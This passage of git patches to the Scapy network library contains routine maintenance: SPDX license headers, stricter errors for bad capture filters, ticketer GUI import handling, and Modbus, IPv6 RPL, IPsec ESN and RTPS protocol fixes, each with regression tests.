GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + """ [MS-RPCE] Remote Procedure Call Protocol Extensions diff --git a/scapy/layers/msrpce/raw/__init__.py b/scapy/layers/msrpce/raw/__init__.py index e69de29bb2d..83a50d88ffc 100644 --- a/scapy/layers/msrpce/raw/__init__.py +++ b/scapy/layers/msrpce/raw/__init__.py @@ -0,0 +1,7 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +""" +'Raw' definitions of DCE/RPC IDL interfaces +""" diff --git a/scapy/layers/ppi.py b/scapy/layers/ppi.py index 749b467fd1b..5b7e2b665d3 100644 --- a/scapy/layers/ppi.py +++ b/scapy/layers/ppi.py @@ -1,19 +1,8 @@ +# SPDX-License-Identifier: GPL-2.0-or-later # This file is part of Scapy -# See http://www.secdev.org/projects/scapy for more information -# Scapy is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 2 of the License, or -# any later version. -# -# Scapy is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with Scapy. If not, see . - +# See https://scapy.net/ for more information # Original PPI author: + # scapy.contrib.description = CACE Per-Packet Information (PPI) header # scapy.contrib.status = loads diff --git a/scapy/libs/ethertypes.py b/scapy/libs/ethertypes.py index 8f18471f151..67b208c7b3f 100644 --- a/scapy/libs/ethertypes.py +++ b/scapy/libs/ethertypes.py @@ -1,3 +1,4 @@ +# SPDX-License-Identifier: BSD-3-Clause # This file is part of Scapy # See https://scapy.net/ for more information @@ -70,6 +71,7 @@ DCA 1234 # DCA - Multicast VALID 1600 # VALID system protocol RCL 1995 # Datapoint Corporation (RCL lan protocol) +NHRP 2001 # NBMA Next Hop Resolution Protocol (RFC2332) NBPCC 3C04 # 3Com NBP Connect complete not registered NBPDG 3C07 # 3Com NBP Datagram (like XNS IDP) not registered PCS 4242 # PCS Basic Block Protocol @@ -124,11 +126,12 @@ MPLS 8847 # MPLS Unicast AXIS 8856 # Axis Communications AB proprietary bootstrap/config PPPOE 8864 # PPP Over Ethernet Session Stage -PAE 888E # 802.1X Port Access Entity +EAPOL 888E # 802.1X EAP over LAN AOE 88A2 # ATA over Ethernet QINQ 88A8 # 802.1ad VLAN stacking LLDP 88CC # Link Layer Discovery Protocol PBB 88E7 # 802.1Q Provider Backbone Bridging +NSH 894F # Network Service Header (RFC8300) XNSSM 9001 # 3Com (Formerly Bridge Communications), XNS Systems Management TCPSM 9002 # 3Com (Formerly Bridge Communications), TCP/IP Systems Management DEBNI AAAA # DECNET? Used by VAX 6220 DEBNI diff --git a/scapy/tools/check_spdx.sh b/scapy/tools/check_spdx.sh new file mode 100644 index 00000000000..1df1a1471e1 --- /dev/null +++ b/scapy/tools/check_spdx.sh @@ -0,0 +1,19 @@ +#!/bin/bash + +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +# Check that all Scapy files have a SPDX + +SCRIPT_DIR=$( cd -- "$( dirname -- "${BASH_SOURCE[0]}" )" &> /dev/null && pwd ) +ROOT_DIR=$SCRIPT_DIR/../.. + +function check_path() { + cd $ROOT_DIR + for ext in "${@:2}"; do + find $1 -name "*.$ext" -exec bash -c '[[ -z $(grep "SPDX" {}) ]] && echo "{}"' \; + done +} + +check_path scapy py From c86d31c43013b9ae3d2be7406e0855475a4eb0ea Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 5 Feb 2024 08:05:17 +0100 Subject: [PATCH 1179/1632] UTscapy: treat SyntaxWarning as errors (#4260) --- scapy/tools/UTscapy.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/scapy/tools/UTscapy.py b/scapy/tools/UTscapy.py index ad734a7b04b..e5d338894a0 100644 --- a/scapy/tools/UTscapy.py +++ b/scapy/tools/UTscapy.py @@ -971,6 +971,9 @@ def main(): logger = logging.getLogger("scapy") logger.addHandler(logging.StreamHandler()) + # Treat SyntaxWarning as errors + warnings.filterwarnings("error", category=SyntaxWarning) + import scapy print(dash + " UTScapy - Scapy %s - %s" % ( scapy.__version__, sys.version.split(" ")[0] From a27b024bdf1722213dee55e949ba35c74f200521 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 5 Feb 2024 08:06:58 +0100 Subject: [PATCH 1180/1632] Make tkinter optional in ticketer (#4258) --- scapy/modules/ticketer.py | 100 +++++++++++++++++++------------------- 1 file changed, 51 insertions(+), 49 deletions(-) diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index fadb5f7e626..a9628f24b88 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -104,7 +104,7 @@ import tkinter.simpledialog as tksd from tkinter import ttk except ImportError: - raise ImportError("tkinter is not installed (`apt install python3-tk` on debian)") + tk = None # CCache # https://web.mit.edu/kerberos/krb5-latest/doc/formats/ccache_file_format.html (official doc but garbage) @@ -279,63 +279,63 @@ class CCache(Packet): # Credits to @mp035 # https://gist.github.com/mp035/9f2027c3ef9172264532fcd6262f3b01 +if tk is not None: + class ScrollFrame(tk.Frame): + def __init__(self, parent): + super().__init__(parent) -class ScrollFrame(tk.Frame): - def __init__(self, parent): - super().__init__(parent) + self.canvas = tk.Canvas(self, borderwidth=0) + self.viewPort = ttk.Frame(self.canvas) + self.vsb = tk.Scrollbar(self, orient="vertical", command=self.canvas.yview) + self.canvas.configure(yscrollcommand=self.vsb.set) - self.canvas = tk.Canvas(self, borderwidth=0) - self.viewPort = ttk.Frame(self.canvas) - self.vsb = tk.Scrollbar(self, orient="vertical", command=self.canvas.yview) - self.canvas.configure(yscrollcommand=self.vsb.set) - - self.vsb.pack(side="right", fill="y") - self.canvas.pack(side="left", fill="both", expand=True) - self.canvas_window = self.canvas.create_window( - (4, 4), window=self.viewPort, anchor="nw", tags="self.viewPort" - ) + self.vsb.pack(side="right", fill="y") + self.canvas.pack(side="left", fill="both", expand=True) + self.canvas_window = self.canvas.create_window( + (4, 4), window=self.viewPort, anchor="nw", tags="self.viewPort" + ) - self.viewPort.bind("", self.onFrameConfigure) - self.canvas.bind("", self.onCanvasConfigure) + self.viewPort.bind("", self.onFrameConfigure) + self.canvas.bind("", self.onCanvasConfigure) - self.viewPort.bind("", self.onEnter) - self.viewPort.bind("", self.onLeave) + self.viewPort.bind("", self.onEnter) + self.viewPort.bind("", self.onLeave) - self.onFrameConfigure(None) + self.onFrameConfigure(None) - def onFrameConfigure(self, event): - """Reset the scroll region to encompass the inner frame""" - self.canvas.configure(scrollregion=self.canvas.bbox("all")) + def onFrameConfigure(self, event): + """Reset the scroll region to encompass the inner frame""" + self.canvas.configure(scrollregion=self.canvas.bbox("all")) - def onCanvasConfigure(self, event): - """Reset the canvas window to encompass inner frame when required""" - canvas_width = event.width - self.canvas.itemconfig(self.canvas_window, width=canvas_width) + def onCanvasConfigure(self, event): + """Reset the canvas window to encompass inner frame when required""" + canvas_width = event.width + self.canvas.itemconfig(self.canvas_window, width=canvas_width) - def onMouseWheel(self, event): - if platform.system() == "Windows": - self.canvas.yview_scroll(int(-1 * (event.delta / 120)), "units") - elif platform.system() == "Darwin": - self.canvas.yview_scroll(int(-1 * event.delta), "units") - else: - if event.num == 4: - self.canvas.yview_scroll(-1, "units") - elif event.num == 5: - self.canvas.yview_scroll(1, "units") - - def onEnter(self, event): - if platform.system() == "Linux": - self.canvas.bind_all("", self.onMouseWheel) - self.canvas.bind_all("", self.onMouseWheel) - else: - self.canvas.bind_all("", self.onMouseWheel) + def onMouseWheel(self, event): + if platform.system() == "Windows": + self.canvas.yview_scroll(int(-1 * (event.delta / 120)), "units") + elif platform.system() == "Darwin": + self.canvas.yview_scroll(int(-1 * event.delta), "units") + else: + if event.num == 4: + self.canvas.yview_scroll(-1, "units") + elif event.num == 5: + self.canvas.yview_scroll(1, "units") + + def onEnter(self, event): + if platform.system() == "Linux": + self.canvas.bind_all("", self.onMouseWheel) + self.canvas.bind_all("", self.onMouseWheel) + else: + self.canvas.bind_all("", self.onMouseWheel) - def onLeave(self, event): - if platform.system() == "Linux": - self.canvas.unbind_all("") - self.canvas.unbind_all("") - else: - self.canvas.unbind_all("") + def onLeave(self, event): + if platform.system() == "Linux": + self.canvas.unbind_all("") + self.canvas.unbind_all("") + else: + self.canvas.unbind_all("") # Build ticketer @@ -1643,6 +1643,8 @@ def edit_ticket(self, i, key=None, hash=None): """ Edit a Kerberos ticket using the GUI """ + if tk is None: + raise ImportError("tkinter is not installed (`apt install python3-tk` on debian)") tkt = self.dec_ticket(i, key=key, hash=hash) pac = tkt.authorizationData.seq[0].adData[0].seq[0].adData From 1587028f84c6fa8eba1bd3b8076de6fe78d71925 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 5 Feb 2024 08:07:59 +0100 Subject: [PATCH 1181/1632] Correctly raise on bad filter (#4241) --- scapy/arch/bpf/supersocket.py | 4 ++-- scapy/arch/libpcap.py | 19 ++++++++++--------- scapy/arch/linux.py | 2 +- test/regression.uts | 9 +++++++++ 4 files changed, 22 insertions(+), 12 deletions(-) diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 06a6dbc9012..c4085669cf3 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -214,8 +214,8 @@ def __init__(self, try: attach_filter(self.bpf_fd, filter, self.iface) filter_attached = True - except ImportError as ex: - warning("Cannot set filter: %s" % ex) + except (ImportError, Scapy_Exception) as ex: + raise Scapy_Exception("Cannot set filter: %s" % ex) if NETBSD and filter_attached is False: # On NetBSD, a filter must be attached to an interface, otherwise # no frame will be received by os.read(). When no filter has been diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 5183c64e76e..81726b624b1 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -162,6 +162,7 @@ def close(self): pcap_datalink, pcap_findalldevs, pcap_freealldevs, + pcap_geterr, pcap_if_t, pcap_lib_version, pcap_next_ex, @@ -386,16 +387,16 @@ def fileno(self): return cast(int, pcap_get_selectable_fd(self.pcap)) def setfilter(self, f): - # type: (str) -> bool + # type: (str) -> None filter_exp = create_string_buffer(f.encode("utf8")) - if pcap_compile(self.pcap, byref(self.bpf_program), filter_exp, 1, -1) == -1: # noqa: E501 - log_runtime.error("Could not compile filter expression %s", f) - return False - else: - if pcap_setfilter(self.pcap, byref(self.bpf_program)) == -1: - log_runtime.error("Could not set filter %s", f) - return False - return True + if pcap_compile(self.pcap, byref(self.bpf_program), filter_exp, 1, -1) >= 0: # noqa: E501 + if pcap_setfilter(self.pcap, byref(self.bpf_program)) >= 0: + # Success + return + errstr = decode_locale_str( + bytearray(pcap_geterr(self.pcap)).strip(b"\x00") + ) + raise Scapy_Exception("Cannot set filter: %s" % errstr) def setnonblock(self, i): # type: (bool) -> None diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index b79cda1315e..566916ff2ad 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -507,7 +507,7 @@ def __init__(self, try: attach_filter(self.ins, filter, self.iface) except (ImportError, Scapy_Exception) as ex: - log_runtime.error("Cannot set filter: %s", ex) + raise Scapy_Exception("Cannot set filter: %s" % ex) if self.promisc: set_promisc(self.ins, self.iface) self.ins.bind((self.iface, type)) diff --git a/test/regression.uts b/test/regression.uts index 5b9f41c8486..cf7899f095c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2262,6 +2262,15 @@ except Scapy_Exception: else: assert False += Check online sniff() with a bad filter +~ needs_root tcpdump libpcap +try: + sniff(timeout=0, filter="bad filter") +except Scapy_Exception: + pass +else: + assert False + = Check offline sniff with lfilter assert len(sniff(offline=[IP()/UDP(), IP()/TCP()], lfilter=lambda x: TCP in x)) == 1 From 2d13e77d17d88835aec5b09cc1457027c8fe2678 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 5 Feb 2024 08:09:08 +0100 Subject: [PATCH 1182/1632] Ignore bad UTF8 in NSS files (#4261) --- scapy/layers/tls/session.py | 5 ++++- test/scapy/layers/tls/tls.uts | 35 +++++++++++++++++++++++++++++++++++ 2 files changed, 39 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tls/session.py b/scapy/layers/tls/session.py index d78562508e7..4b2a54a74b7 100644 --- a/scapy/layers/tls/session.py +++ b/scapy/layers/tls/session.py @@ -43,7 +43,7 @@ def load_nss_keys(filename): except FileNotFoundError: warning("Cannot open NSS Key Log: %s", filename) return {} - else: + try: with open(filename) as fd: for line in fd: if line.startswith("#"): @@ -72,6 +72,9 @@ def load_nss_keys(filename): keys[data[0]][client_random] = secret return keys + except UnicodeDecodeError as ex: + warning("Cannot read NSS Key Log: %s %s", filename, str(ex)) + return {} # Note the following import may happen inside connState.__init__() diff --git a/test/scapy/layers/tls/tls.uts b/test/scapy/layers/tls/tls.uts index 0d51bb00c1b..029ac100ce3 100644 --- a/test/scapy/layers/tls/tls.uts +++ b/test/scapy/layers/tls/tls.uts @@ -1597,6 +1597,41 @@ if shutil.which("editcap"): assert b"z2|gxarIKOxt,G1d>.Q2MzGY[k@" in packets[13].msg[0].data conf = bck_conf += pcapng file with a non-UTF-8 Decryption Secrets Block + +# GH3936 + +hdump = """ +00000000 0a 0d 0d 0a c4 00 00 00 4d 3c 2b 1a 01 00 00 00 |........M<+.....| +00000010 ff ff ff ff ff ff ff ff 02 00 37 00 49 6e 74 65 |..........7.Inte| +00000020 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 20 69 37 |l(R) Core(TM) i7| +00000030 2d 36 37 30 30 48 51 20 43 50 55 20 40 20 32 2e |-6700HQ CPU @ 2.| +00000040 36 30 47 48 7a 20 28 77 69 74 68 20 53 53 45 34 |60GHz (with SSE4| +00000050 2e 32 29 00 03 00 2a 00 4c 69 6e 75 78 20 34 2e |.2)...*.Linux 4.| +00000060 32 30 2e 31 32 2d 67 65 6e 74 6f 6f 2d 61 6e 64 |20.12-gentoo-and| +00000070 72 6f 6d 65 64 61 2d 32 30 31 39 30 33 30 35 2d |romeda-20190305-| +00000080 76 31 00 00 04 00 33 00 44 75 6d 70 63 61 70 20 |v1....3.Dumpcap | +00000090 28 57 69 72 65 73 68 61 72 6b 29 20 33 2e 31 2e |(Wireshark) 3.1.| +000000a0 30 20 28 76 33 2e 31 2e 30 72 63 30 2d 34 36 38 |0 (v3.1.0rc0-468| +000000b0 2d 67 65 33 65 34 32 32 32 62 29 00 00 00 00 00 |-ge3e4222b).....| +000000c0 c4 00 00 00 0a 00 00 00 c4 00 00 00 4b 53 4c 54 |............KSLT| +000000d0 b0 00 00 00 43 4c 49 45 4e 54 5f 52 41 4e 44 4f |....CLIENT_RANDO| +000000e0 4d 20 41 36 39 39 35 43 37 44 35 41 35 31 35 42 |M A6995C7D5A515B| +000000f0 30 44 34 39 41 31 42 38 31 33 33 39 33 34 32 37 |0D49A1B813393427| +00000100 43 43 35 43 39 44 42 37 36 36 37 38 45 34 38 44 |CC5C9DB76678E48D| +00000110 31 41 43 35 39 31 44 37 44 37 44 35 42 38 30 31 |1AC591D7D7D5B801| +00000120 44 43 20 34 30 33 37 35 37 34 30 31 42 30 30 37 |DC 403757401B007| +00000130 34 35 33 38 33 41 46 36 41 36 30 38 31 39 42 43 |45383AF6A60819BC| +00000140 37 46 38 42 36 33 39 33 42 37 32 45 44 45 39 46 |7F8B6393B72EDE9F| +00000150 45 42 32 30 44 33 31 33 46 38 31 42 39 c0 bd bb |EB20D313F81B9...| +00000160 c6 36 46 36 41 43 37 34 32 46 46 46 35 45 43 31 |.6F6AC742FFF5EC1| +00000170 44 31 41 32 44 39 39 41 46 34 39 35 33 45 31 33 |D1A2D99AF4953E13| +00000180 33 34 41 0a c4 00 00 00 |34A.....| +00000188 +""".strip() + +assert len(rdpcap(io.BytesIO(import_hexcap(hdump)))) == 0 + = pcap file & external TLS Key Log file with TCPSession (without extms) * GH3722 From 5fa6428a1843fb851d8c6de1d0c59dad0168df78 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 5 Feb 2024 08:09:38 +0100 Subject: [PATCH 1183/1632] Rename modbus 'payload' field (#4243) --- scapy/contrib/modbus.py | 12 ++++++------ test/contrib/modbus.uts | 7 +++++++ 2 files changed, 13 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/modbus.py b/scapy/contrib/modbus.py index 3b23506e082..1b316807ed0 100644 --- a/scapy/contrib/modbus.py +++ b/scapy/contrib/modbus.py @@ -684,7 +684,7 @@ class ModbusPDUReservedFunctionCodeRequest(_ModbusPDUNoPayload): name = "Reserved Function Code Request" fields_desc = [ ByteEnumField("funcCode", 0x00, _reserved_funccode_request), - StrFixedLenField('payload', '', 255), ] + StrFixedLenField('mb_payload', '', 255), ] def mysummary(self): return self.sprintf("Modbus Reserved Request %funcCode%") @@ -694,7 +694,7 @@ class ModbusPDUReservedFunctionCodeResponse(_ModbusPDUNoPayload): name = "Reserved Function Code Response" fields_desc = [ ByteEnumField("funcCode", 0x00, _reserved_funccode_response), - StrFixedLenField('payload', '', 255), ] + StrFixedLenField('mb_payload', '', 255), ] def mysummary(self): return self.sprintf("Modbus Reserved Response %funcCode%") @@ -704,7 +704,7 @@ class ModbusPDUReservedFunctionCodeError(_ModbusPDUNoPayload): name = "Reserved Function Code Error" fields_desc = [ ByteEnumField("funcCode", 0x00, _reserved_funccode_error), - StrFixedLenField('payload', '', 255), ] + StrFixedLenField('mb_payload', '', 255), ] def mysummary(self): return self.sprintf("Modbus Reserved Error %funcCode%") @@ -740,7 +740,7 @@ class ModbusPDUUserDefinedFunctionCodeRequest(_ModbusPDUNoPayload): ModbusByteEnumField( "funcCode", 0x00, _userdefined_funccode_request, "Unknown user-defined request function Code"), - StrFixedLenField('payload', '', 255), ] + StrFixedLenField('mb_payload', '', 255), ] def mysummary(self): return self.sprintf("Modbus User-Defined Request %funcCode%") @@ -752,7 +752,7 @@ class ModbusPDUUserDefinedFunctionCodeResponse(_ModbusPDUNoPayload): ModbusByteEnumField( "funcCode", 0x00, _userdefined_funccode_response, "Unknown user-defined response function Code"), - StrFixedLenField('payload', '', 255), ] + StrFixedLenField('mb_payload', '', 255), ] def mysummary(self): return self.sprintf("Modbus User-Defined Response %funcCode%") @@ -764,7 +764,7 @@ class ModbusPDUUserDefinedFunctionCodeError(_ModbusPDUNoPayload): ModbusByteEnumField( "funcCode", 0x00, _userdefined_funccode_error, "Unknown user-defined error function Code"), - StrFixedLenField('payload', '', 255), ] + StrFixedLenField('mb_payload', '', 255), ] def mysummary(self): return self.sprintf("Modbus User-Defined Error %funcCode%") diff --git a/test/contrib/modbus.uts b/test/contrib/modbus.uts index 5a010ef73c0..ed9f89564b8 100644 --- a/test/contrib/modbus.uts +++ b/test/contrib/modbus.uts @@ -534,3 +534,10 @@ assert p.payload.id == 0 = ModbusPDU2B0EReadDeviceIdentificationError raw(ModbusPDU2B0EReadDeviceIdentificationError()) == b'\xab\x01' + += Modbus test for payload subfield +# GH4112 +pkt = ModbusPDUUserDefinedFunctionCodeRequest(b'M\x00\x05\x00\n') +pkt = next(iter(pkt)) +assert pkt.mb_payload == b'\x00\x05\x00\n' + From 90ec725fd1a1159717545b4b04653bf1e5fd8cab Mon Sep 17 00:00:00 2001 From: Thibaut Vandervelden Date: Wed, 26 Apr 2023 13:48:05 +0200 Subject: [PATCH 1184/1632] Add RPL Hop-by-Hop option (RFC 6553) --- scapy/layers/inet6.py | 23 +++++++++++++++++++++++ test/scapy/layers/inet6.uts | 22 ++++++++++++++++++++++ 2 files changed, 45 insertions(+) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 046d2141b9f..d520aa154a7 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -57,6 +57,7 @@ StrLenField, X3BytesField, XBitField, + XByteField, XIntField, XShortField, ) @@ -783,6 +784,27 @@ def extract_padding(self, p): return b"", p +class RplOption(Packet): # RFC 6553 - RPL Option + name = "RPL Option" + fields_desc = [_OTypeField("otype", 0x63, _hbhopts), + ByteField("optlen", 4), + BitField("Down", 0, 1), + BitField("RankError", 0, 1), + BitField("ForwardError", 0, 1), + BitField("unused", 0, 5), + XByteField("RplInstanceId", 0), + XShortField("SenderRank", 0)] + + def alignment_delta(self, curpos): # alignment requirement : 2n+0 + x = 2 + y = 0 + delta = x * ((curpos - y + x - 1) // x) + y - curpos + return delta + + def extract_padding(self, p): + return b"", p + + class Jumbo(Packet): # IPv6 Hop-By-Hop Option name = "Jumbo Payload" fields_desc = [_OTypeField("otype", 0xC2, _hbhopts), @@ -818,6 +840,7 @@ def extract_padding(self, p): _hbhoptcls = {0x00: Pad1, 0x01: PadN, 0x05: RouterAlert, + 0x63: RplOption, 0xC2: Jumbo, 0xC9: HAO} diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 4311f0b2cb4..ad9703eaf9a 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -572,6 +572,25 @@ raw(RouterAlert(optlen=3, value=0xffff)) == b'\x05\x03\xff\xff' a=RouterAlert(b'\x05\x03\xff\xff') a.otype == 0x05 and a.optlen == 3 and a.value == 0xffff +############ +############ ++ Test RPL Option (RFC 6553) + += RplOption - Basic Instantiation +raw(RplOption()) == b'c\x04\x00\x00\x00\x00' + += RplOption - Basic Dissection +a=RplOption(b'c\x04\x00\x00\x00\x00') +a.otype == 0x63 and a.optlen == 4 and a.Down == False and a.RankError == 0 and a.ForwardError == 0 and a.RplInstanceId == 0 and a.SenderRank == 0 + += RplOption - Instantiation with specific values +a=RplOption(RplInstanceId=0x1e, SenderRank=0x800) +a.otype == 0x63 and a.optlen == 4 and a.Down == False and a.RankError == 0 and a.ForwardError == 0 and a.RplInstanceId == 0x1e and a.SenderRank == 0x800 + += RplOption - Instantiation with specific values +a=RplOption(Down=True, RplInstanceId=0x1e, SenderRank=0x800) +a.otype == 0x63 and a.optlen == 4 and a.Down == True and a.RankError == 0 and a.ForwardError == 0 and a.RplInstanceId == 0x1e and a.SenderRank == 0x800 +raw(a) == b'c\x04\x80\x1e\x08\x00' ############ ############ @@ -628,6 +647,9 @@ raw(IPv6ExtHdrHopByHop(options=[HAO()])) == b';\x02\x01\x02\x00\x00\xc9\x10\x00\ = IPv6ExtHdrHopByHop - Instantiation with RouterAlert option raw(IPv6ExtHdrHopByHop(options=[RouterAlert()])) == b';\x00\x05\x02\x00\x00\x01\x00' + += IPv6ExtHdrHopByHop - Instantiation with RPL option +raw(IPv6ExtHdrHopByHop(options=[RplOption()])) == b';\x00c\x04\x00\x00\x00\x00' = IPv6ExtHdrHopByHop - Instantiation with Jumbo option raw(IPv6ExtHdrHopByHop(options=[Jumbo()])) == b';\x00\xc2\x04\x00\x00\x00\x00' From ca5a0698745baa7fe0f3355c581485002642c6cd Mon Sep 17 00:00:00 2001 From: Van-Phu Ha Date: Mon, 20 Feb 2023 11:42:51 +0100 Subject: [PATCH 1185/1632] Extended Sequence Numbers support in ESP --- scapy/layers/ipsec.py | 34 +++++++++++++++++++++------------- test/scapy/layers/ipsec.uts | 25 +++++++++++++++++++++++++ 2 files changed, 46 insertions(+), 13 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 57d180b71c2..b89746b5f01 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -674,16 +674,17 @@ def sign(self, pkt, key, esn_en=False, esn=0): mac = self.new_mac(key) if pkt.haslayer(ESP): - mac.update(raw(pkt[ESP])) + mac.update(bytes(pkt[ESP])) + if esn_en: + # RFC4303 sect 2.2.1 + mac.update(struct.pack('!L', esn)) pkt[ESP].data += mac.finalize()[:self.icv_size] elif pkt.haslayer(AH): - clone = zero_mutable_fields(pkt.copy(), sending=True) + mac.update(bytes(zero_mutable_fields(pkt.copy(), sending=True))) if esn_en: - temp = raw(clone) + struct.pack('!L', esn) - else: - temp = raw(clone) - mac.update(temp) + # RFC4302 sect 2.5.1 + mac.update(struct.pack('!L', esn)) pkt[AH].icv = mac.finalize()[:self.icv_size] return pkt @@ -712,7 +713,10 @@ def verify(self, pkt, key, esn_en=False, esn=0): pkt_icv = pkt.data[len(pkt.data) - self.icv_size:] clone = pkt.copy() clone.data = clone.data[:len(clone.data) - self.icv_size] - temp = raw(clone) + mac.update(bytes(clone)) + if esn_en: + # RFC4303 sect 2.2.1 + mac.update(struct.pack('!L', esn)) elif pkt.haslayer(AH): if len(pkt[AH].icv) != self.icv_size: @@ -721,12 +725,11 @@ def verify(self, pkt, key, esn_en=False, esn=0): pkt[AH].icv = pkt[AH].icv[:self.icv_size] pkt_icv = pkt[AH].icv clone = zero_mutable_fields(pkt.copy(), sending=False) + mac.update(bytes(clone)) if esn_en: - temp = raw(clone) + struct.pack('!L', esn) - else: - temp = raw(clone) + # RFC4302 sect 2.5.1 + mac.update(struct.pack('!L', esn)) - mac.update(temp) computed_icv = mac.finalize()[:self.icv_size] # XXX: Cannot use mac.verify because the ICV can be truncated @@ -1033,7 +1036,10 @@ def _encrypt_esp(self, pkt, seq_num=None, iv=None, esn_en=None, esn=None): esn_en=esn_en or self.esn_en, esn=esn or self.esn) - self.auth_algo.sign(esp, self.auth_key) + self.auth_algo.sign(esp, + self.auth_key, + esn_en=esn_en or self.esn_en, + esn=esn or self.esn) if self.nat_t_header: nat_t_header = self.nat_t_header.copy() @@ -1144,7 +1150,9 @@ def _decrypt_esp(self, pkt, verify=True, esn_en=None, esn=None): if verify: self.check_spi(pkt) - self.auth_algo.verify(encrypted, self.auth_key) + self.auth_algo.verify(encrypted, self.auth_key, + esn_en=esn_en or self.esn_en, + esn=esn or self.esn) esp = self.crypt_algo.decrypt(self, encrypted, self.crypt_key, self.crypt_icv_size or diff --git a/test/scapy/layers/ipsec.uts b/test/scapy/layers/ipsec.uts index eedac7bc6bd..7ccf0f2b2ef 100644 --- a/test/scapy/layers/ipsec.uts +++ b/test/scapy/layers/ipsec.uts @@ -1506,6 +1506,31 @@ try: except IPSecIntegrityError as err: err +####################################### += IPv4 / ESP - Transport - AES-CBC - HMAC-SHA2-256-128 -- ESN + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= TCP(sport=45012, dport=80) +p /= Raw('hello world') +p = IP(raw(p)) +p + +enc_key = bytes.fromhex("85ee354b4675a9c5d16e3d6f4118043b") +auth_key = bytes.fromhex("6f79bf94da7dde3c86009934d9258f1b3fc2f5382aca9c9cb8e216eed235f34c") + +sa = SecurityAssociation(ESP, spi=0xcf54ccdf, crypt_algo='AES-CBC', + crypt_key=enc_key, + auth_algo='SHA2-256-128', auth_key=auth_key, + esn_en=True, esn=68) +e = sa.encrypt(p, iv=bytes.fromhex("11223344112233441122334411223344")) + + +assert bytes(e) == bytes.fromhex("4500006c000100004032745a0101010102020202cf54ccdf0000000111223344112233441122334411223344f5bda519c9ae64f283f0fc18a8d253eca8b34c2120c8958a97ec9d8e67756da2523fce9b5541c57fddf090afc2bfd97e8703203953f853eb61482e4c1384d4c8") + +* integrity verification should pass +d = sa.decrypt(e) +d + ####################################### = IPv4 / ESP - Transport - AES-GCM - NULL From 0591d240fe2f1d5095d27026d0c47a1ae6049b43 Mon Sep 17 00:00:00 2001 From: Seulbae Kim Date: Mon, 20 Feb 2023 20:40:30 -0500 Subject: [PATCH 1186/1632] RTPS: Handle SequenceNumber_t correctly As per DDS-RTPS specification, `firstSN` (named `firstAvailableSeqNum` in scapy) and `lastSN` (named `lastSeqNum` in scapy) fields of a Heartbeat submessage are of type `SequenceNumber_t`, which consists of two subfields, namely, `int32_t high` and `uint32_t low`. This change allows us to correctly assign values to fields. For example, currently, `firstAvailableSeqNum = 0x01` is packed as `\x00\x00\x00\x01\x00\x00\x00\x00`, which is semantically wrong. With the change, it is packed as `\x00\x00\x00\x00\x01\x00\x00\x00`. --- scapy/contrib/rtps/rtps.py | 11 ++++++++--- test/contrib/rtps.uts | 38 ++++++++++++++++++++++++++++++++++++++ 2 files changed, 46 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/rtps/rtps.py b/scapy/contrib/rtps/rtps.py index 82c9ffb8d1e..3edeebde508 100644 --- a/scapy/contrib/rtps/rtps.py +++ b/scapy/contrib/rtps/rtps.py @@ -25,7 +25,6 @@ X3BytesField, XByteField, XIntField, - XLongField, XNBytesField, XShortField, XStrLenField, @@ -396,8 +395,14 @@ class RTPSSubMessage_HEARTBEAT(EPacket): fmt="4s", enum=_rtps_reserved_entity_ids, ), - XLongField("firstAvailableSeqNum", 0), - XLongField("lastSeqNum", 0), + EField(IntField("firstAvailableSeqNumHi", 0), + endianness_from=e_flags), + EField(IntField("firstAvailableSeqNumLow", 0), + endianness_from=e_flags), + EField(IntField("lastSeqNumHi", 0), + endianness_from=e_flags), + EField(IntField("lastSeqNumLow", 0), + endianness_from=e_flags), EField(IntField("count", 0), endianness_from=e_flags), ] diff --git a/test/contrib/rtps.uts b/test/contrib/rtps.uts index ea4c25fa3ed..9d2ae7b2889 100644 --- a/test/contrib/rtps.uts +++ b/test/contrib/rtps.uts @@ -405,3 +405,41 @@ p1 = RTPS( assert p0.build() == d assert p1.build() == d assert p1 == p0 + ++ Test for pr #3914 += RTPS Heartbeat SequenceNumber_t packing and dissection + +d = 